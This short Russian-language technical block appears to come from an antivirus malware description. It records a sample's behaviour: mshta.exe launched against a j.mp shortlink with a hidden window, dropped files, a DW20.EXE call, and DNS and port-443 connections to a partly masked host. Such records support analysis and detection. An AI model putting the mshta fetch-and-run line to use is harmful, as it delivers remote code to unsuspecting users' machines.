Техническая информация
- '<SYSTEM32>\mshta.exe' https://j.mp/dhyjdsajgdyuawdvhafsghd
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1360
- %HOMEPATH%\application data\microsoft\forms\powerpnt.box
- %TEMP%\1169149.cvr
- 'j.#p':443
- 'j.#p':443
- DNS ASK j.#p
- '<SYSTEM32>\mshta.exe' https://j.mp/dhyjdsajgdyuawdvhafsghd' (со скрытым окном)